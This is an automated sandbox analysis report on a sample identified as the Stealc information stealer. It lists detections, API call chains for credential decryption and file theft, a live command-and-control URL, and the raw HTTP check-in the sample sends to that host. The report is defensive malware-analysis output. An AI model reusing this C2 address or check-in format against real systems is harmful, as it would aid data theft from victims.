Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
RJQySowVRb.exe

Overview

General Information

Sample name:RJQySowVRb.exe
renamed because original name is a hash value
Original sample name:a4bb6e4d88c94f0389873b241e6eee8e.exe
Analysis ID:1528325
MD5:a4bb6e4d88c94f0389873b241e6eee8e
SHA1:f44584d6fde4b9bb925a7355d02299220904ccb1
SHA256:9086348efcc7f6bb5fd00b9919c6fecaa04a9c58aeabaaaac80a1913e9a1e3b4
Tags:exeStealcuser-abuse_ch
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Machine Learning detection for sample
Searches for specific processes (likely to inject)
AV process strings found (often used to terminate AV products)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Extensive use of GetProcAddress (often used to hide API calls)
Found evaded block containing many API calls
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
Internet Provider seen in connection with other malware
One or more processes crash
PE file contains sections with non-standard names
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • RJQySowVRb.exe (PID: 1968 cmdline: "C:\Users\user\Desktop\RJQySowVRb.exe" MD5: A4BB6E4D88C94F0389873B241E6EEE8E)
    • WerFault.exe (PID: 5596 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1228 MD5: C31336C1EFC2CCB44B4326EA793040F2)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security
    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
      • 0x1cc0:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
      00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Smokeloader_3687686funknownunknown
        • 0x30d:$a: 0C 8B 45 F0 89 45 C8 8B 45 C8 8B 40 3C 8B 4D F0 8D 44 01 04 89
        00000000.00000002.2219633257.0000000000400000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Click to see the 3 entries
          SourceRuleDescriptionAuthorStrings
          0.2.RJQySowVRb.exe.22d0e67.3.unpackJoeSecurity_StealcYara detected StealcJoe Security
            0.2.RJQySowVRb.exe.400000.0.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
              0.2.RJQySowVRb.exe.400000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                0.3.RJQySowVRb.exe.2320000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security
                  0.2.RJQySowVRb.exe.22d0e67.3.raw.unpackJoeSecurity_StealcYara detected StealcJoe Security
                    Click to see the 1 entries
                    No Sigma rule has matched
                    TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                    2024-10-07T19:32:03.717476+020020442431Malware Command and Control Activity Detected192.168.2.54970462.204.41.15080TCP

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection

                    barindex
                    Source: RJQySowVRb.exeAvira: detected
                    Source: 00000000.00000003.2034048074.0000000002320000.00000004.00001000.00020000.00000000.sdmpMalware Configuration Extractor: StealC {"C2 url": "http://62.204.41.150/edd20096ecef326d.php", "Botnet": "default6_cap"}
                    Source: RJQySowVRb.exeReversingLabs: Detection: 28%
                    Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                    Source: RJQySowVRb.exeJoe Sandbox ML: detected
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040C820 memset,lstrlenA,CryptStringToBinaryA,memcpy,lstrcatA,lstrcatA,lstrcatA,0_2_0040C820
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00407240 GetProcessHeap,HeapAlloc,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00407240
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00409AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00409AC0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00418EA0 CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00418EA0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00409B60 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_00409B60
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DCA87 memset,lstrlen,CryptStringToBinaryA,memcpy,lstrcat,lstrcat,lstrcat,0_2_022DCA87
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D74A7 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_022D74A7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D9D27 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_022D9D27
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E9107 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_022E9107
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D9DC7 CryptUnprotectData,LocalAlloc,memcpy,LocalFree,0_2_022D9DC7

                    Compliance

                    barindex
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeUnpacked PE file: 0.2.RJQySowVRb.exe.400000.0.unpack
                    Source: RJQySowVRb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0040E430
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_004138B0 wsprintfA,FindFirstFileA,lstrcatA,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcatA,lstrlenA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_004138B0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00414570 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00414570
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00414910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00414910
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0040ED20
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0040BE70
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040DE10
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_004016D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_004016D0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0040DA80
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00413EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_00413EA0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0040F6B0
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DE697 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_022DE697
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E3B17 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_022E3B17
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E4B77 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022E4B77
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DEF87 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_022DEF87
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E47D7 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_022E47D7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DE077 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DE077
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DDCE7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_022DDCE7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DF8F1 FindFirstFileA,0_2_022DF8F1
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DC0D7 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_022DC0D7
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022D1937 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022D1937
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022E4107 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_022E4107
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022DF917 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_022DF917

                    Networking

                    barindex
                    Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.5:49704 -> 62.204.41.150:80
                    Source: Malware configuration extractorURLs: http://62.204.41.150/edd20096ecef326d.php
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                    Source: global trafficHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 36 33 35 33 32 43 32 31 39 33 33 31 35 38 38 32 31 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="hwid"3763532C21933158821099------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build"default6_cap------GIEBFHCAKFBGDHIDHIDB--
                    Source: Joe Sandbox ViewASN Name: TNNET-ASTNNetOyMainnetworkFI TNNET-ASTNNetOyMainnetworkFI
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: unknownTCP traffic detected without corresponding DNS query: 62.204.41.150
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00404880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlenA,lstrlenA,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00404880
                    Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 62.204.41.150Connection: Keep-AliveCache-Control: no-cache
                    Source: unknownHTTP traffic detected: POST /edd20096ecef326d.php HTTP/1.1Content-Type: multipart/form-data; boundary=----GIEBFHCAKFBGDHIDHIDBHost: 62.204.41.150Content-Length: 219Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 33 37 36 33 35 33 32 43 32 31 39 33 33 31 35 38 38 32 31 30 39 39 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 65 66 61 75 6c 74 36 5f 63 61 70 0d 0a 2d 2d 2d 2d 2d 2d 47 49 45 42 46 48 43 41 4b 46 42 47 44 48 49 44 48 49 44 42 2d 2d 0d 0a Data Ascii: ------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="hwid"3763532C21933158821099------GIEBFHCAKFBGDHIDHIDBContent-Disposition: form-data; name="build"default6_cap------GIEBFHCAKFBGDHIDHIDB--
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmp, RJQySowVRb.exe, 00000000.00000002.2220001059.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmp, RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/:
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmp, RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009CA000.00000004.00000020.00020000.00000000.sdmp, RJQySowVRb.exe, 00000000.00000002.2220102140.0000000000994000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.php
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpS
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpT
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpd
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.00000000009AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/edd20096ecef326d.phpx
                    Source: RJQySowVRb.exe, 00000000.00000002.2220102140.0000000000979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150/x
                    Source: RJQySowVRb.exe, 00000000.00000002.2220001059.000000000093E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.150=
                    Source: Amcache.hve.4.drString found in binary or memory: http://upx.sf.net

                    System Summary

                    barindex
                    Source: 00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1228
                    Source: RJQySowVRb.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.2220068769.000000000094D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000000.00000002.2220235298.00000000022D0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@2/5@0/1
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00419600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00419600
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00413720
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\5N7VU7YO.htmJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1968
                    Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\ProgramData\Microsoft\Windows\WER\Temp\a2ae6b55-e046-43f0-af09-188c001bf4ddJump to behavior
                    Source: RJQySowVRb.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: RJQySowVRb.exeReversingLabs: Detection: 28%
                    Source: unknownProcess created: C:\Users\user\Desktop\RJQySowVRb.exe "C:\Users\user\Desktop\RJQySowVRb.exe"
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 1228
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
                    Source: RJQySowVRb.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

                    Data Obfuscation

                    barindex
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeUnpacked PE file: 0.2.RJQySowVRb.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.bak:R;.nuna:R;.roxis:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeUnpacked PE file: 0.2.RJQySowVRb.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: RJQySowVRb.exeStatic PE information: section name: .bak
                    Source: RJQySowVRb.exeStatic PE information: section name: .nuna
                    Source: RJQySowVRb.exeStatic PE information: section name: .roxis
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0041B035 push ecx; ret 0_2_0041B048
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0040020D pushfd ; iretd 0_2_00400211
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_009532D9 push eax; ret 0_2_009532E8
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_009532CA push eax; ret 0_2_009532E8
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_009502FB push 7DD07DC0h; iretd 0_2_0095030C
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_0094F7F5 pushfd ; iretd 0_2_0094F7F8
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_022EB29C push ecx; ret 0_2_022EB2AF
                    Source: C:\Users\user\Desktop\RJQySowVRb.exeCode function: 0_2_00419860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00419860
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
